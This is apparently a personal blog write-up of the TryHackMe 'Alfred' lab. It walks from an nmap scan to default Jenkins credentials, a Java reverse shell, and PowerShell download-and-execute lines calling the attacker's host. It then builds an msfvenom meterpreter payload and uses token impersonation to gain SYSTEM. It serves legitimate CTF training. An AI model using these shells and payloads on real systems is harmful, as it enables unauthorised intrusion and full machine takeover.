u915

Daniel Cano MerchΓ‘n - Hacking & Tech

Writeup Tryhackme Alfred

Writeup about the Tryhackme machine Alfred

0 - Basic info

Windows machine

1 - Reconnaissance and enumeration

Starting with a nmap scan:

sudo nmap -sS -sC -sV -O -p- -oN scan.txt  --script vuln 10.10.πŸ˜„
# Nmap 7.91 scan initiated Wed Jun  9 22:37:40 2021 as: nmap -sS -sC -sV -O -p- -oN scan.txt --script vuln -Pn 10.10.πŸ˜„
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 10.10.πŸ˜„
Host is up (0.040s latency).
Not shown: 65532 filtered ports
PORT     STATE SERVICE            VERSION
80/tcp   open  http               Microsoft IIS httpd 7.5
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-IIS/7.5
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
3389/tcp open  ssl/ms-wbt-server?
| rdp-vuln-ms12-020: 
|   VULNERABLE:
|   MS12-020 Remote Desktop Protocol Denial Of Service Vulnerability
|     State: VULNERABLE
|     IDs:  CVE:CVE-2012-0152
|     Risk factor: Medium  CVSSv2: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:N/A:P)
|           Remote Desktop Protocol vulnerability that could allow remote attackers to cause a denial of service.
|           
|     Disclosure date: 2012-03-13
|     References:
|       http://technet.microsoft.com/en-us/security/bulletin/ms12-020
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0152
|   
|   MS12-020 Remote Desktop Protocol Remote Code Execution Vulnerability
|     State: VULNERABLE
|     IDs:  CVE:CVE-2012-0002
|     Risk factor: High  CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
|           Remote Desktop Protocol vulnerability that could allow remote attackers to execute arbitrary code on the targeted system.
|           
|     Disclosure date: 2012-03-13
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0002
|_      http://technet.microsoft.com/en-us/security/bulletin/ms12-020
|_ssl-ccs-injection: No reply from server (TIMEOUT)
|_sslv2-drown: 
8080/tcp open  http               Jetty 9.4.z-SNAPSHOT
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|_  /robots.txt: Robots file
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2012 R2 (92%), Microsoft Windows Server 2008 R2 or Windows 8 (90%), Microsoft Windows Server 2008 R2 (89%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (89%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (89%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (89%), Microsoft Windows Server 2008 (88%), Microsoft Windows 7 SP1 (88%), Microsoft Windows 8.1 R1 (88%), Microsoft Windows 7 or Windows Server 2008 R2 (87%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jun  9 22:43:06 2021 -- 1 IP address (1 host up) scanned in 327.24 seconds

Nmap found 3 ports 80, 3389, 8080

Nothing useful on the port 80 just the good Bruce Wayne. But on the port 8080 there is a Jenkins running with a login form.

2 - Vulnerability Identification

Just tested the typical admin credentials and worked… this is why you should never use default passwords.

admin/admin

On the dashboard > project > configure > build there is a command line to play.

3 - Exploit

Using this feature is possible to execute remote commands, generating a reverse shell with:

String host="10.9.πŸ˜„";
int port=4433;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

powershell iex (New-Object Net.WebClient).DownloadString('http://10.9.πŸ˜„/invoke.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.9.πŸ˜„ -Port 4433

Setting up a listener on my machine

nc -lvp 4433 

Sucess

C:\Users\bruce\Desktop>type user.txt
type user.txt
7900πŸ˜„

4 - Post-Exploitation and privilege escalation

Following the instructions I generated a meterpreter shell into a .exe file with msfvenom:

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.9.πŸ˜„ LPORT=4434 -f exe -o sh.exe

The .exe is served on my machine with a python server on the port 7777

python3 -m http.server 7777

Using powershell to download the file to the machine

C:\Users\bruce\Desktop>powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.9.πŸ˜„:7777/sh.exe','sh.exe')" 
powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.9.πŸ˜„:7777/sh.exe','sh.exe')"

Also setting up a meterpreter listener:

msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.9.πŸ˜„       yes       The listen address (an interface may be specified)
   LPORT  4434             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

Finally triggering the .exe file:

C:\Users\bruce\Desktop>powershell "Start-Process 'sh.exe'"       
powershell "Start-Process 'sh.exe'"

Writting this I realized that another simple Metasploit approach was easier and was to use the module web_delivery, maybe could be an option on another machine…

exploit/multi/script/web_delivery

Following the Tryhackme instructions I used the module incognito:

meterpreter > load incognito
Loading extension incognito...Success.

And listing the tokens available:

meterpreter > list_tokens -g

[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
\
BUILTIN\Administrators
BUILTIN\IIS_IUSRS
BUILTIN\Users
NT AUTHORITY\Authenticated Users
NT AUTHORITY\NTLM Authentication
NT AUTHORITY\SERVICE
NT AUTHORITY\This Organization
NT AUTHORITY\WRITE RESTRICTED
NT SERVICE\AppHostSvc
NT SERVICE\AudioEndpointBuilder
NT SERVICE\BFE
NT SERVICE\CertPropSvc
NT SERVICE\CscService
NT SERVICE\Dnscache
NT SERVICE\eventlog
NT SERVICE\EventSystem
NT SERVICE\FDResPub
NT SERVICE\iphlpsvc
NT SERVICE\LanmanServer
NT SERVICE\MMCSS
NT SERVICE\PcaSvc
NT SERVICE\PlugPlay
NT SERVICE\RpcEptMapper
NT SERVICE\Schedule
NT SERVICE\SENS
NT SERVICE\SessionEnv
NT SERVICE\Spooler
NT SERVICE\TrkWks
NT SERVICE\UmRdpService
NT SERVICE\UxSms
NT SERVICE\WinDefend
NT SERVICE\Winmgmt
NT SERVICE\WSearch
NT SERVICE\wuauserv

Impersonation Tokens Available
========================================
NT AUTHORITY\NETWORK
NT SERVICE\AudioSrv
NT SERVICE\DcomLaunch
NT SERVICE\Dhcp
NT SERVICE\DPS
NT SERVICE\lmhosts
NT SERVICE\MpsSvc
NT SERVICE\netprofm
NT SERVICE\nsi
NT SERVICE\PolicyAgent
NT SERVICE\Power
NT SERVICE\ShellHWDetection
NT SERVICE\W32Time
NT SERVICE\WdiServiceHost
NT SERVICE\WinHttpAutoProxySvc
NT SERVICE\wscsvc

The firts one is about the group Administrators so lets use it:

meterpreter > impersonate_token "BUILTIN\Administrators"
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM
[+] Delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM


meterpreter > getuid 
Server username: NT AUTHORITY\SYSTEM

But with this I only got the privileged token and not the full system permissions. To solve this , migrate the meterpreter shell to another process owned by NT AUTHORITY\SYSTEM to get a the real privileged permissions.

There are a lot of process like svchost.exe, services.exe or winlogin.exe running as SYSTEM. Migrate to one of them to just get full access on the machine.

meterpreter > migrate 671

Finally reading the root flag:

C:\Windows\System32\config>type root.txt
type root.txt
dff0πŸ˜„

Thanks for reading!